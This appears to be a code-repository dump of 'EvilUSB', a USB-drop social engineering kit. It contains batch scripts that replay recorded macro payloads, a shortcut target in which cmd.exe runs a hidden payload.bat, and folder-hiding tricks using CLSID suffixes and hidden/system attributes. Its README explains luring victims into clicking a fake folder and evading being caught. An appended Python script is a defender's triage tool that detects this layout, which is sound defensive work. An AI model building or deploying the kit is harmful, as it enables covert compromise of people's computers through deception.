├── Example
│   ├── .Recycle Bin
│   │   ├── MacroCMD.exe
│   │   ├── Record macro.bat
│   │   ├── brown-fox.payload
│   │   ├── fake-update.payload
│   │   └── payload.bat
│   ├── Debug Payload.lnk
│   ├── New folder.lnk
│   ├── New folder
│   │   └── secrets.txt
│   ├── README.md
│   └── Toggle visibility.bat
└── README.md


/Example/.Recycle Bin/MacroCMD.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/.Recycle Bin/MacroCMD.exe
--------------------------------------------------------------------------------
/Example/.Recycle Bin/Record macro.bat:
--------------------------------------------------------------------------------
@echo off
set /p "recording=Give macro a name: "
echo Enable mouse movements?
choice /c YN
IF ERRORLEVEL 1 set "switch= "
IF ERRORLEVEL 2 set "switch=/dm /dc"
echo Beginning to record...
echo [TIP] Press {INSERT} to stop recording
echo.
echo.
timeout /nobreak /t 10
echo.
echo [RECORDING] PRESS INSERT TO STOP!
MacroCMD.exe /r /ek:45 %switch% %recording%.payload
--------------------------------------------------------------------------------
/Example/.Recycle Bin/brown-fox.payload:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Example/.Recycle Bin/fake-update.payload:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Example/.Recycle Bin/payload.bat:
--------------------------------------------------------------------------------
@echo off
:: Set payload name
set "payload-name=fake-update"

:: (Un)comment to prevent Explorer window from opening
::explorer "%cd%\New Folder"


:: CD into Recycle Bin directory
cd /d %~dp0

:: Playback MacroCMD commands
MacroCMD.exe /p %payload-name%.payload
--------------------------------------------------------------------------------
/Example/Debug Payload.lnk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/Debug Payload.lnk
--------------------------------------------------------------------------------
/Example/New folder.lnk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/New folder.lnk
--------------------------------------------------------------------------------
/Example/New folder/secrets.txt:
--------------------------------------------------------------------------------
This folder will popup once they click the payload (Can be disabled in script)
--------------------------------------------------------------------------------
/Example/README.md:
--------------------------------------------------------------------------------
## How to create the shortcut (.lnk)
1. Create a shortcut to any file in the root folder
2. Go to properties and change the `Target` to

```
C:\Windows\System32\cmd.exe /c "explorer "%cd%\New Folder"&if exist ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\" (".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\payload.bat") else (if exist ".Recycle Bin\" (".Recycle Bin\payload.bat"))"
```

**This opens `New Folder` in Explorer, then checks whether the `.Recycle Bin` folder exists (under either its CLSID-suffixed or its plain name) and runs the `payload.bat` inside it via a relative path.**

Make sure that the `Open in` box is left blank.
--------------------------------------------------------------------------------
/Example/Toggle visibility.bat:
--------------------------------------------------------------------------------
@echo off
if exist ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\" (
    echo Unhiding...
    attrib -h -s ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}"
    attrib -h -s "New Folder"
    ren ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}" ".Recycle Bin"
) else (
    if exist ".Recycle Bin\" (
        echo Hiding...
        ren ".Recycle Bin\" ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}"
        attrib +h +s ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}"
        attrib +h +s "New Folder"
    )
)
echo.
echo Press any key to exit
pause >nul
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# EvilUSB

These are some EvilUSB Sticks...

![EvilUSB Sticks](http://i.imgur.com/wDYmoYJ.jpg)


## What is EvilUSB?

EvilUSB is a pentesting USB device that the target computer recognizes as a regular USB flash drive. This innocent-looking social engineering device can be placed at anyone's desk/mailbox, and as soon as they get hold of it and plug it into their computer, just like any average user, they would attempt to browse the USB flash drive and take a look at the contents of the drive.
From there on, they're just a click away from getting infected.

## How does it work?

![EvilUSB Drive](https://i.gyazo.com/b9ebdf1cd99fa32d31148ce185f34760.png)

Each EvilUSB comes with the following files:
```
EvilUSB (D:)
|-- % [H]
|   |-- evil.bat || .exe [H]
+-- New folder.lnk
```
Notes:
* `%: Invisible (U+180E) Space Character`
* `[H]: Hidden`

Because the `%` folder is [H]idden, it is not visible in Windows Explorer by default. That means the only file visible to the user is the shortcut `New folder.lnk`, which is linked to the malicious file, `/%/evil.bat || .exe`. `New folder.lnk` is given the icon of a folder, hence the name of the shortcut file. That makes "New folder" look identical to an actual, real folder. So, as soon as the target attempts to open the "folder", he actually runs the shortcut file, which is linked to the malicious file, `evil.exe`/`evil.bat`, and from there on he's infected.

### Disguising the Attack

As soon as the user opens the "folder", he will notice that no folder has been opened. This would make EvilUSB more suspicious. For that reason, it is a good idea to include the following lines at the very top of the malicious `evil.bat` file:
```
@echo off
mkdir ../New folder&cd ../New folder&start .
```

The purpose of the above lines is to make the Attack less suspicious.
For that matter, below is the explanation of the above batch code:
* `&`: Command separator that allows the next command to be executed regardless of the previous command's success/failure
* `@echo off`: Disable output
* `mkdir ../New folder`: Create a new folder called "New folder" in the root directory of the drive (D:/)
* `cd ../New folder`: Change directory to the newly created folder
* `start .`: Open the newly created folder

## Can this be achieved with the use of any USB Flash Drive?

Technically, yes.

## Should you use your pre-owned USB Flash Drives for this Attack?

Definitely not. Considering you'll be sacrificing your USB Flash Drive, it is not a good idea to waste tens of dollars per attack. If you don't want to risk losing your USB Stick and would attempt to get the USB Flash Drive back from your target Victim, you are putting your anonymity at risk and the chances of you getting caught are just as high.

## So, what should I do if I want to perform this attack "for educational purposes"?

Since this Social Engineering attack does not require a USB Flash Drive with over 64MB Capacity Storage, it is recommended that you order a couple of some cheap 64MB USB Flash Drives. (See below)

## Suggestions

I'm open to your suggestions, feedback and new ideas. There's much more to come to this Project, and I'm happy to announce that I finally got done publishing this idea and creating a Proof-of-Concept (PoC) EvilUSB.

## Credits

EvilUSB was created by [@0xCoto](https://github.com/0xCoto).
--------------------------------------------------------------------------------
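A defender's triage of a mounted drive for the layout both READMEs describe, as an added example that is not code from the EvilUSB repository: it flags CLSID-suffixed or invisible-named folders, hidden+system folders (Windows only), scripts inside them, and `.lnk` files whose raw bytes name a command interpreter. The function names, the interpreter watch list and the sample layout are assumptions made for this example, and the byte search is a heuristic rather than a full `.lnk` parser.

```python
import re, stat, sys, tempfile, unicodedata
from pathlib import Path

# Folder name ending in a shell CLSID, e.g. ".Recycle Bin.{645FF040-...}"
CLSID_SUFFIX = re.compile(r"\.\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
# Assumed watch list: programs a folder-icon shortcut should not be launching
INTERPRETERS = ("cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe")
SCRIPT_EXTS = {".bat", ".cmd", ".exe", ".vbs", ".ps1"}
HIDDEN_SYSTEM = stat.FILE_ATTRIBUTE_HIDDEN | stat.FILE_ATTRIBUTE_SYSTEM

def is_invisible_name(name):
    """True when every character is a space, format or control character (e.g. U+180E)."""
    return bool(name) and all(unicodedata.category(c) in ("Cf", "Cc", "Zs") for c in name)

def lnk_interpreters(path):
    """Heuristic: search the raw .lnk bytes for interpreter names (ANSI and UTF-16LE)."""
    data = path.read_bytes().lower()
    return [e for e in INTERPRETERS if e.encode() in data or e.encode("utf-16-le") in data]

def triage_drive(root):
    """Return (finding, name) pairs for the top level of a mounted removable drive."""
    findings = []
    for entry in sorted(Path(root).iterdir()):
        name = entry.name
        if entry.is_dir():
            attrs = getattr(entry.stat(), "st_file_attributes", 0)  # Windows only, else 0
            checks = (("clsid-suffixed-folder", CLSID_SUFFIX.search(name)),
                      ("invisible-folder-name", is_invisible_name(name)),
                      ("hidden-system-folder", (attrs & HIDDEN_SYSTEM) == HIDDEN_SYSTEM))
            reasons = [label for label, hit in checks if hit]
            findings += [(r, name) for r in reasons]
            if reasons:  # look one level into any concealed folder for executables
                findings += [("script-in-concealed-folder", f"{name}/{c.name}")
                             for c in sorted(entry.iterdir()) if c.suffix.lower() in SCRIPT_EXTS]
        elif entry.suffix.lower() == ".lnk":
            findings += [(f"lnk-launches-{e}", name) for e in lnk_interpreters(entry)]
    return findings

def build_constructed_sample(root):
    """Constructed layout mirroring the two variants the page describes (harmless files)."""
    base = Path(root)
    for folder, script in ((".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}", "payload.bat"),
                           ("\u180e", "evil.bat")):
        (base / folder).mkdir()
        (base / folder / script).write_text("@echo off\n")
    (base / "New folder").mkdir()
    # Not a real shortcut: constructed bytes that only carry a UTF-16LE target string
    (base / "New folder.lnk").write_bytes(b"L\0\0\0" + "cmd.exe /c".encode("utf-16-le"))
    return base

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_constructed_sample(tempfile.mkdtemp())
    for finding, name in triage_drive(target):
        print(f"{finding:28} {name!r}")
```

Run it with a drive root as the only argument; with no argument it scans the constructed sample.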